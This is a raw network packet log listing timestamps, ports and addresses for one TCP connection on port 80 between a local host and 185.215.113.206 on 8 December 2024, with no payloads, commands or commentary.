Dec 8, 2024 19:52:07.924942017 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.925643921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.925693035 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.925698996 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.925743103 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.926867008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.926915884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.926949024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.927000999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.928299904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.928344011 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.928436041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.928483963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.929701090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.929749966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.929773092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.929817915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.930728912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.930785894 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.930809975 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.930856943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.931559086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.931607008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.931659937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.931710005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.932486057 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.932535887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.932626963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.932676077 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.933830976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.933877945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177225113 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177279949 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177294016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177298069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177305937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177320004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177331924 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177336931 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177344084 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177356005 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177366972 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177375078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177380085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177392960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177402973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177405119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177417994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177429914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177431107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177444935 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177448988 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177464008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177469969 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177476883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177489042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177499056 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177500010 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177512884 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177522898 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177530050 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177535057 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177540064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177548885 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177560091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177570105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177572966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177584887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177598000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177601099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177613974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177627087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177630901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177639008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177639961 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177651882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177663088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177663088 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177675962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177687883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177699089 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177702904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177717924 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177725077 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177731037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177735090 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177743912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177756071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177767038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177769899 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177779913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177791119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177800894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177803993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177814007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177820921 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177826881 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177841902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177853107 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177855015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177866936 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177874088 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177881002 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177892923 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177898884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177903891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177917957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177928925 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177928925 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177939892 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.177942038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177954912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177967072 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177977085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.177989006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178009987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178021908 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178023100 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178033113 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178044081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178055048 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178066015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178066015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178078890 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178087950 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178091049 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178105116 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178113937 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178117990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178132057 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178134918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178144932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178154945 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178164959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178174973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178177118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178189993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178190947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178210974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178214073 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178224087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178231001 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178235054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178242922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178256035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178263903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178267956 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178280115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178288937 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178292036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178303957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178309917 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178318024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178325891 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178332090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178344011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178348064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178356886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178368092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178376913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178380966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178392887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178405046 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178411961 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178416967 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178426027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178431988 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178443909 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178448915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178459883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178471088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178477049 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178483963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178488016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178499937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178502083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178510904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178517103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178519011 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178523064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178529978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178539991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178550959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178561926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178569078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178574085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178586006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178595066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178596973 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178608894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178622007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178626060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178632975 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178638935 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178646088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178657055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178657055 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178668022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178670883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178680897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178694963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178699017 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178708076 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178719044 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178730965 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178733110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178742886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178750992 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178755999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178766966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178771019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178777933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178790092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.178801060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.178832054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.231940985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.232038021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.232059956 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.232104063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.232322931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.232377052 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.232413054 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.232470989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.233427048 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.233474016 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.233519077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.233580112 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.234508991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.234556913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.234596968 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.234642982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.235598087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.235651016 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.235773087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.235819101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.236660004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.236730099 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.236737967 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.236777067 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.237709045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.237759113 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.237796068 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.237843037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.238847017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.238904953 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.238965034 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.239011049 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.239980936 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.240035057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.240159035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.240207911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.241197109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.241250038 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.241345882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.241391897 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.242309093 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.242358923 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.242446899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.242496014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.243232012 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.243294001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.243366957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.243415117 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.244132042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.244153023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.244179010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.244195938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.245242119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.245284081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.245291948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.245326042 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.246401072 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.246448994 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.246479034 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.246529102 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.247908115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.247956038 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.248039007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.248085976 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.249289989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.249337912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.249342918 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.249382973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.250425100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.250480890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.250504971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.250549078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.251329899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.251372099 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.251390934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.251435995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.252203941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.252260923 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.252264977 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.252307892 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.253034115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.253082037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.253146887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.253194094 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.254017115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.254065037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.254070997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.254122019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.255048990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.255106926 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.255285025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.255337954 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.256136894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.256184101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.256242990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.256297112 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.257414103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.257461071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.257484913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.257531881 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.258696079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.258740902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.258789062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.258847952 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.259788990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.259838104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.259918928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.259979963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.297821045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.297875881 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.297907114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.297952890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.298297882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.298345089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.298383951 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.298439026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.299297094 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.299346924 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.299364090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.299410105 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.300987959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.301034927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.301059008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.301106930 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.301507950 CET	80	49730	185.215.113.206	192.168.2.4
